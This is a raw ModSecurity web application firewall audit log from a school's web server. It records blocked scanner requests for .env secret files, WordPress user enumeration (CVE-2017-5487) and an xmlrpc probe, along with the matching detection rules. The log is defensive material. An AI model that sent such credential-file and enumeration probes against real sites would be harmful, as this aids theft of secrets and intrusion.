Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7558779-Z-- --e33e4e5f-A-- [29/Apr/2025:18:01:26 +0700] aBCxhhmWB8ZGI9fN-VFUIAAAAIE 103.236.140.4 34550 103.236.140.4 8181 --e33e4e5f-B-- GET /blog/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --e33e4e5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e33e4e5f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924486430877 895 (- - -) Stopwatch2: 1745924486430877 895; combined=381, p1=344, p2=0, p3=0, p4=0, p5=37, sr=154, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e33e4e5f-Z-- --35e13616-A-- [29/Apr/2025:18:01:27 +0700] aBCxhxmWB8ZGI9fN-VFUIQAAAIw 103.236.140.4 34556 103.236.140.4 8181 --35e13616-B-- GET /system/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --35e13616-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35e13616-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924487312736 886 (- - -) Stopwatch2: 1745924487312736 886; combined=377, p1=338, p2=0, p3=0, p4=0, p5=39, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35e13616-Z-- --f06e603a-A-- [29/Apr/2025:18:01:27 +0700] aBCxhxmWB8ZGI9fN-VFUIwAAAJE 103.236.140.4 34562 103.236.140.4 8181 --f06e603a-B-- GET /public/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --f06e603a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f06e603a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924487819153 849 (- - -) Stopwatch2: 1745924487819153 849; combined=308, p1=273, p2=0, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f06e603a-Z-- --2b43f36e-A-- [29/Apr/2025:18:01:28 +0700] aBCxiBmWB8ZGI9fN-VFUJAAAAJI 103.236.140.4 34564 103.236.140.4 8181 --2b43f36e-B-- GET /shop/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 93.123.109.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.123.109.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --2b43f36e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b43f36e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745924488167758 719 (- - -) Stopwatch2: 1745924488167758 719; combined=264, p1=231, p2=0, p3=0, p4=0, p5=32, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b43f36e-Z-- --5f93b442-A-- [29/Apr/2025:21:17:11 +0700] aBDfZyUYsqS7mE9-0zow-wAAABc 103.236.140.4 52248 103.236.140.4 8181 --5f93b442-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.99.106.105 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.99.106.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5f93b442-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f93b442-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745936231653814 745 (- - -) Stopwatch2: 1745936231653814 745; combined=300, p1=260, p2=0, p3=0, p4=0, p5=39, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f93b442-Z-- --37ee597a-A-- [29/Apr/2025:23:31:19 +0700] aBD-17M38gUEppT2vWNQ2gAAANY 103.236.140.4 60096 103.236.140.4 8181 --37ee597a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --37ee597a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37ee597a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745944279340268 4714 (- - -) Stopwatch2: 1745944279340268 4714; combined=2408, p1=743, p2=1623, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37ee597a-Z-- --1fe13175-A-- [29/Apr/2025:23:31:22 +0700] aBD-2p11ysLXBHLtLPWvaAAAAFc 103.236.140.4 60112 103.236.140.4 8181 --1fe13175-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.144 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.144 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1fe13175-C-- demo.sayHello --1fe13175-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1fe13175-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745944282609092 6813 (- - -) Stopwatch2: 1745944282609092 6813; combined=4914, p1=656, p2=3998, p3=37, p4=41, p5=106, sr=81, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1fe13175-Z-- --a9b8e31b-A-- [29/Apr/2025:23:57:09 +0700] aBEE5SUYsqS7mE9-0zo9oAAAABI 103.236.140.4 37820 103.236.140.4 8181 --a9b8e31b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (compatible; Konqueror/4.5; Windows) KHTML/4.5.4 (like Gecko) Accept-Charset: utf-8 --a9b8e31b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9b8e31b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745945829773065 768 (- - -) Stopwatch2: 1745945829773065 768; combined=326, p1=288, p2=0, p3=0, p4=0, p5=38, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9b8e31b-Z-- --b0f16720-A-- [30/Apr/2025:00:02:14 +0700] aBEGFhmWB8ZGI9fN-VFoygAAAJg 103.236.140.4 39056 103.236.140.4 8181 --b0f16720-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es50 Accept-Charset: utf-8 --b0f16720-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0f16720-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745946134946387 770 (- - -) Stopwatch2: 1745946134946387 770; combined=325, p1=277, p2=0, p3=0, p4=0, p5=48, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b0f16720-Z-- --022b4874-A-- [30/Apr/2025:00:12:53 +0700] aBEIlbM38gUEppT2vWNTLgAAAMQ 103.236.140.4 41506 103.236.140.4 8181 --022b4874-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Accept-Charset: utf-8 --022b4874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --022b4874-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745946773522955 894 (- - -) Stopwatch2: 1745946773522955 894; combined=385, p1=338, p2=0, p3=0, p4=0, p5=46, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --022b4874-Z-- --7db13f15-A-- [30/Apr/2025:00:59:02 +0700] aBETZhmWB8ZGI9fN-VFsFwAAAJA 103.236.140.4 52728 103.236.140.4 8181 --7db13f15-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 206.189.95.232 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 206.189.95.232 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --7db13f15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7db13f15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745949542095073 911 (- - -) Stopwatch2: 1745949542095073 911; combined=398, p1=360, p2=0, p3=0, p4=0, p5=38, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7db13f15-Z-- --48e38007-A-- [30/Apr/2025:04:22:06 +0700] aBFC_tBN0baiHx4WjiZRMgAAAFU 103.236.140.4 53246 103.236.140.4 8181 --48e38007-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.192 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --48e38007-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48e38007-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745961726540722 2846 (- - -) Stopwatch2: 1745961726540722 2846; combined=1458, p1=474, p2=943, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48e38007-Z-- --5a1bb735-A-- [30/Apr/2025:04:48:54 +0700] aBFJRjsHLQ2TK6eM3eo3pAAAAII 103.236.140.4 59550 103.236.140.4 8181 --5a1bb735-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 137.184.203.63 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 137.184.203.63 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5a1bb735-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a1bb735-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745963334917434 781 (- - -) Stopwatch2: 1745963334917434 781; combined=346, p1=310, p2=0, p3=0, p4=0, p5=36, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a1bb735-Z-- --03d29731-A-- [30/Apr/2025:04:54:44 +0700] aBFKpNBN0baiHx4WjiZTCwAAAEA 103.236.140.4 60922 103.236.140.4 8181 --03d29731-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept-Charset: utf-8 --03d29731-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --03d29731-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745963684435372 736 (- - -) Stopwatch2: 1745963684435372 736; combined=295, p1=259, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03d29731-Z-- --d0a99501-A-- [30/Apr/2025:04:56:30 +0700] aBFLDtBN0baiHx4WjiZTNgAAAEw 103.236.140.4 33104 103.236.140.4 8181 --d0a99501-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel 2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --d0a99501-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0a99501-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745963790858590 840 (- - -) Stopwatch2: 1745963790858590 840; combined=334, p1=294, p2=0, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0a99501-Z-- --95bfdc38-A-- [30/Apr/2025:05:15:13 +0700] aBFPcdBN0baiHx4WjiZUFAAAAEA 103.236.140.4 37432 103.236.140.4 8181 --95bfdc38-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; G8441) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 YaBrowser/19.1.3.198.00 Mobile Safari/537.36 Accept-Charset: utf-8 --95bfdc38-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95bfdc38-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745964913052294 824 (- - -) Stopwatch2: 1745964913052294 824; combined=335, p1=300, p2=0, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --95bfdc38-Z-- --a19fab66-A-- [30/Apr/2025:05:25:06 +0700] aBFRwj1td-6YjlnYDRJ66gAAABA 103.236.140.4 39738 103.236.140.4 8181 --a19fab66-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36 Accept-Charset: utf-8 --a19fab66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a19fab66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745965506076471 811 (- - -) Stopwatch2: 1745965506076471 811; combined=338, p1=298, p2=0, p3=0, p4=0, p5=39, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a19fab66-Z-- --0bce174f-A-- [30/Apr/2025:06:57:49 +0700] aBFnfT1td-6YjlnYDRKAEwAAAAE 103.236.140.4 33142 103.236.140.4 8181 --0bce174f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Android; Mobile; rv:35.0) Gecko/35.0 Firefox/35.0 Accept-Charset: utf-8 --0bce174f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0bce174f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745971069223888 807 (- - -) Stopwatch2: 1745971069223888 807; combined=307, p1=270, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
